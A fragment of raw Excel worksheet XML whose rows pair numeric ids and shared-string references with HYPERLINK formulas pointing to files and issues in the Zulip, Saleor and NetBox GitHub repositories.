      </c>
    </row>
    <row r="147" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A147">
        <v>830</v>
      </c>
      <c r="B147" t="s">
        <v>771</v>
      </c>
      <c r="C147" t="s">
        <v>772</v>
      </c>
      <c r="D147" t="s">
        <v>10</v>
      </c>
      <c r="E147" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/15390", "https://github.com/netbox-community/netbox/issues/15390")</f>
        <v>https://github.com/netbox-community/netbox/issues/15390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workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft"/>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43</v>
      </c>
      <c r="B2" t="s">
        <v>642</v>
      </c>
      <c r="C2" t="s">
        <v>773</v>
      </c>
      <c r="D2" t="s">
        <v>458</v>
      </c>
      <c r="E2" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md", "https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md</v>
      </c>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3">
        <v>52</v>
      </c>
      <c r="B3" t="s">
        <v>617</v>
      </c>
      <c r="C3" t="s">
        <v>774</v>
      </c>
      <c r="D3" t="s">
        <v>497</v>
      </c>
      <c r="E3" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_stripe.py", "https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_stripe.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_stripe.py</v>
      </c>
    </row>
    <row r="4" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A4">
        <v>53</v>
      </c>
      <c r="B4" t="s">
        <v>610</v>
      </c>
      <c r="C4" t="s">
        <v>775</v>
      </c>
      <c r="D4" t="s">
        <v>497</v>
      </c>
      <c r="E4" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_stripe.py", "https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_stripe.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_stripe.py</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A5">
        <v>56</v>
      </c>
      <c r="B5" t="s">
        <v>776</v>
      </c>
      <c r="C5" t="s">
        <v>777</v>
      </c>
      <c r="D5" t="s">
        <v>497</v>
      </c>
      <c r="E5" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_remote_billing.py", "https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_remote_billing.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_remote_billing.py</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A6">
        <v>64</v>
      </c>
      <c r="B6" t="s">
        <v>610</v>
      </c>
      <c r="C6" t="s">
        <v>778</v>
      </c>
      <c r="D6" t="s">
        <v>497</v>
      </c>
      <c r="E6" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/web/src/ui_init.js", "https://github.com/zulip/zulip/tree/11.2/web/src/ui_init.js")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/web/src/ui_init.js</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A7">
        <v>67</v>
      </c>
      <c r="B7" t="s">
        <v>621</v>
      </c>
      <c r="C7" t="s">
        <v>779</v>
      </c>
      <c r="D7" t="s">
        <v>497</v>
      </c>
      <c r="E7" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zilencer/views.py", "https://github.com/zulip/zulip/tree/11.2/zilencer/views.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zilencer/views.py</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A8">
        <v>79</v>
      </c>
      <c r="B8" t="s">
        <v>639</v>
      </c>
      <c r="C8" t="s">
        <v>780</v>
      </c>
      <c r="D8" t="s">
        <v>497</v>
      </c>
      <c r="E8" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_message_edit_notifications.py", "https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_message_edit_notifications.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_message_edit_notifications.py</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A9">
        <v>85</v>
      </c>
      <c r="B9" t="s">
        <v>639</v>
      </c>
      <c r="C9" t="s">
        <v>781</v>
      </c>
      <c r="D9" t="s">
        <v>497</v>
      </c>
      <c r="E9" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/tornado/event_queue.py", "https://github.com/zulip/zulip/tree/11.2/zerver/tornado/event_queue.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/tornado/event_queue.py</v>
      </c>
    </row>
    <row r="10" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A10">
        <v>86</v>
      </c>
      <c r="B10" t="s">
        <v>617</v>
      </c>
      <c r="C10" t="s">
        <v>782</v>
      </c>
      <c r="D10" t="s">
        <v>497</v>
      </c>
      <c r="E10" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/actions/realm_linkifiers.py", "https://github.com/zulip/zulip/tree/11.2/zerver/actions/realm_linkifiers.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/actions/realm_linkifiers.py</v>
      </c>
    </row>
    <row r="11" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A11">
        <v>87</v>
      </c>
      <c r="B11" t="s">
        <v>621</v>
      </c>
      <c r="C11" t="s">
        <v>783</v>
      </c>
      <c r="D11" t="s">
        <v>497</v>
      </c>
      <c r="E11" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/actions/streams.py", "https://github.com/zulip/zulip/tree/11.2/zerver/actions/streams.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/actions/streams.py</v>
      </c>
    </row>
    <row r="12" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A12">
        <v>90</v>
      </c>
      <c r="B12" t="s">
        <v>621</v>
      </c>
      <c r="C12" t="s">
        <v>784</v>
      </c>
      <c r="D12" t="s">
        <v>497</v>
      </c>
      <c r="E12" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/streams.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/streams.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/streams.py</v>
      </c>
    </row>
    <row r="13" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A13">
        <v>91</v>
      </c>
      <c r="B13" t="s">
        <v>639</v>
      </c>
      <c r="C13" t="s">
        <v>785</v>
      </c>
      <c r="D13" t="s">
        <v>497</v>
      </c>
      <c r="E13" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/narrow.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/narrow.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/narrow.py</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A14">
        <v>100</v>
      </c>
      <c r="B14" t="s">
        <v>786</v>
      </c>
      <c r="C14" t="s">
        <v>787</v>
      </c>
      <c r="D14" t="s">
        <v>497</v>
      </c>
      <c r="E14" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/message.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/message.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/message.py</v>
      </c>
    </row>
    <row r="15" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A15">
        <v>101</v>
      </c>
      <c r="B15" t="s">
        <v>621</v>
      </c>
      <c r="C15" t="s">
        <v>788</v>
      </c>
      <c r="D15" t="s">
        <v>497</v>
      </c>
      <c r="E15" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/message.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/message.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/message.py</v>
      </c>
    </row>
    <row r="16" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A16">
        <v>102</v>
      </c>
      <c r="B16" t="s">
        <v>621</v>
      </c>
      <c r="C16" t="s">
        <v>789</v>
      </c>
      <c r="D16" t="s">
        <v>497</v>
      </c>
      <c r="E16" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/attachments.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/attachments.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/attachments.py</v>
      </c>
    </row>
    <row r="17" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A17">
        <v>103</v>
      </c>
      <c r="B17" t="s">
        <v>639</v>
      </c>
      <c r="C17" t="s">
        <v>790</v>
      </c>
      <c r="D17" t="s">
        <v>497</v>
      </c>
      <c r="E17" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/soft_deactivation.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/soft_deactivation.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/soft_deactivation.py</v>
      </c>
    </row>
    <row r="18" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A18">
        <v>107</v>
      </c>
      <c r="B18" t="s">
        <v>614</v>
      </c>
      <c r="C18" t="s">
        <v>791</v>
      </c>
      <c r="D18" t="s">
        <v>497</v>
      </c>
      <c r="E18" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/webhooks/stripe/view.py", "https://github.com/zulip/zulip/tree/11.2/zerver/webhooks/stripe/view.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/webhooks/stripe/view.py</v>
      </c>
    </row>
    <row r="19" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A19">
        <v>108</v>
      </c>
      <c r="B19" t="s">
        <v>610</v>
      </c>
      <c r="C19" t="s">
        <v>792</v>
      </c>
      <c r="D19" t="s">
        <v>497</v>
      </c>
      <c r="E19" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/webhooks/stripe/tests.py", "https://github.com/zulip/zulip/tree/11.2/zerver/webhooks/stripe/tests.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/webhooks/stripe/tests.py</v>
      </c>
    </row>
    <row r="20" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A20">
        <v>118</v>
      </c>
      <c r="B20" t="s">
        <v>612</v>
      </c>
      <c r="C20" t="s">
        <v>793</v>
      </c>
      <c r="D20" t="s">
        <v>497</v>
      </c>
      <c r="E20" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zproject/backends.py", "https://github.com/zulip/zulip/tree/11.2/zproject/backends.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zproject/backends.py</v>
      </c>
    </row>
    <row r="21" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A21">
        <v>127</v>
      </c>
      <c r="B21" t="s">
        <v>610</v>
      </c>
      <c r="C21" t="s">
        <v>794</v>
      </c>
      <c r="D21" t="s">
        <v>497</v>
      </c>
      <c r="E21" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/tree/3.21.19/saleor/tax/tests/test_checkout_calculations.py", "https://github.com/saleor/saleor/tree/3.21.19/saleor/tax/tests/test_checkout_calculations.py")</f>
        <v>https://github.com/saleor/saleor/tree/3.21.19/saleor/tax/tests/test_checkout_calculations.py</v>
      </c>
    </row>
    <row r="22" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A22">
        <v>128</v>
      </c>
      <c r="B22" t="s">
        <v>610</v>
      </c>
      <c r="C22" t="s">
        <v>795</v>
      </c>
      <c r="D22" t="s">
        <v>497</v>
      </c>
      <c r="E22" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/tree/3.21.19/saleor/tax/calculations/__init__.py", "https://github.com/saleor/saleor/tree/3.21.19/saleor/tax/calculations/__init__.py")</f>
        <v>https://github.com/saleor/saleor/tree/3.21.19/saleor/tax/calculations/__init__.py</v>
      </c>
    </row>
    <row r="23" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A23">
        <v>129</v>
      </c>
      <c r="B23" t="s">
        <v>610</v>
      </c>
      <c r="C23" t="s">
        <v>796</v>
      </c>
      <c r="D23" t="s">
        <v>497</v>
      </c>
      <c r="E23" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/tree/3.21.19/saleor/discount/tests/test_rounding_issue.py", "https://github.com/saleor/saleor/tree/3.21.19/saleor/discount/tests/test_rounding_issue.py")</f>
        <v>https://github.com/saleor/saleor/tree/3.21.19/saleor/discount/tests/test_rounding_issue.py</v>
      </c>
    </row>
    <row r="24" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A24">
        <v>130</v>
      </c>
      <c r="B24" t="s">
        <v>797</v>
      </c>
      <c r="C24" t="s">
        <v>798</v>
      </c>
      <c r="D24" t="s">
        <v>497</v>
      </c>
      <c r="E24" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/tree/3.21.19/saleor/graphql/core/connection.py", "https://github.com/saleor/saleor/tree/3.21.19/saleor/graphql/core/connection.py")</f>
        <v>https://github.com/saleor/saleor/tree/3.21.19/saleor/graphql/core/connection.py</v>
      </c>
    </row>
    <row r="25" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A25">
        <v>133</v>
      </c>
      <c r="B25" t="s">
        <v>610</v>
      </c>
      <c r="C25" t="s">
        <v>799</v>
      </c>
      <c r="D25" t="s">
        <v>458</v>
      </c>
      <c r="E25" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-3.5.md", "https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-3.5.md")</f>
        <v>https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-3.5.md</v>
      </c>
    </row>
    <row r="26" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A26">
        <v>135</v>
      </c>
      <c r="B26" t="s">
        <v>610</v>
      </c>
      <c r="C26" t="s">
        <v>678</v>
      </c>
      <c r="D26" t="s">
        <v>458</v>
      </c>
      <c r="E26" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-4.1.md", "https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-4.1.md")</f>
        <v>https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-4.1.md</v>
      </c>
    </row>
    <row r="27" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A27">
        <v>136</v>
      </c>
      <c r="B27" t="s">
        <v>610</v>
      </c>
      <c r="C27" t="s">
        <v>667</v>
      </c>
      <c r="D27" t="s">
        <v>458</v>
      </c>
      <c r="E27" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-3.3.md", "https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-3.3.md")</f>
        <v>https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-3.3.md</v>
      </c>
    </row>
    <row r="28" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A28">
        <v>137</v>
      </c>
      <c r="B28" t="s">
        <v>610</v>
      </c>
      <c r="C28" t="s">
        <v>800</v>
      </c>
      <c r="D28" t="s">
        <v>458</v>
      </c>
      <c r="E28" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-3.7.md", "https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-3.7.md")</f>
        <v>https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-3.7.md</v>
      </c>
    </row>
    <row r="29" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A29">
        <v>140</v>
      </c>
      <c r="B29" t="s">
        <v>631</v>
      </c>
      <c r="C29" t="s">
        <v>801</v>
      </c>
      <c r="D29" t="s">
        <v>497</v>
      </c>
      <c r="E29" t="str">
        <f t="shared" ref="E29:E34" si="0">HYPERLINK("https://github.com/netbox-community/netbox/tree/v4.4.1/netbox/project-static/dist/graphiql/graphiql.min.js", "https://github.com/netbox-community/netbox/tree/v4.4.1/netbox/project-static/dist/graphiql/graphiql.min.js")</f>
        <v>https://github.com/netbox-community/netbox/tree/v4.4.1/netbox/project-static/dist/graphiql/graphiql.min.js</v>
      </c>
    </row>
    <row r="30" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A30">
        <v>154</v>
      </c>
      <c r="B30" t="s">
        <v>786</v>
      </c>
      <c r="C30" t="s">
        <v>802</v>
      </c>
      <c r="D30" t="s">
        <v>497</v>
      </c>
      <c r="E30" t="str">
        <f t="shared" si="0"/>
        <v>https://github.com/netbox-community/netbox/tree/v4.4.1/netbox/project-static/dist/graphiql/graphiql.min.js</v>
      </c>
    </row>
    <row r="31" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A31">
        <v>155</v>
      </c>
      <c r="B31" t="s">
        <v>617</v>
      </c>
      <c r="C31" t="s">
        <v>803</v>
      </c>
      <c r="D31" t="s">
        <v>497</v>
      </c>
      <c r="E31" t="str">
        <f t="shared" si="0"/>
        <v>https://github.com/netbox-community/netbox/tree/v4.4.1/netbox/project-static/dist/graphiql/graphiql.min.js</v>
      </c>
    </row>
    <row r="32" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A32">
        <v>158</v>
      </c>
      <c r="B32" t="s">
        <v>804</v>
      </c>
      <c r="C32" t="s">
        <v>805</v>
      </c>
      <c r="D32" t="s">
        <v>497</v>
      </c>
      <c r="E32" t="str">
        <f t="shared" si="0"/>
        <v>https://github.com/netbox-community/netbox/tree/v4.4.1/netbox/project-static/dist/graphiql/graphiql.min.js</v>
      </c>
    </row>
    <row r="33" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A33">
        <v>159</v>
      </c>
      <c r="B33" t="s">
        <v>806</v>
      </c>
      <c r="C33" t="s">
        <v>807</v>
      </c>
      <c r="D33" t="s">
        <v>497</v>
      </c>
      <c r="E33" t="str">
        <f t="shared" si="0"/>
        <v>https://github.com/netbox-community/netbox/tree/v4.4.1/netbox/project-static/dist/graphiql/graphiql.min.js</v>
      </c>
    </row>
    <row r="34" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A34">
        <v>160</v>
      </c>
      <c r="B34" t="s">
        <v>808</v>
      </c>
      <c r="C34" t="s">
        <v>809</v>
      </c>
      <c r="D34" t="s">
        <v>497</v>
      </c>
      <c r="E34" t="str">
        <f t="shared" si="0"/>
        <v>https://github.com/netbox-community/netbox/tree/v4.4.1/netbox/project-static/dist/graphiql/graphiql.min.js</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2025-10-01T14:34:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-07T09:42:34Z</dcterms:modified>
</cp:coreProperties>
</file>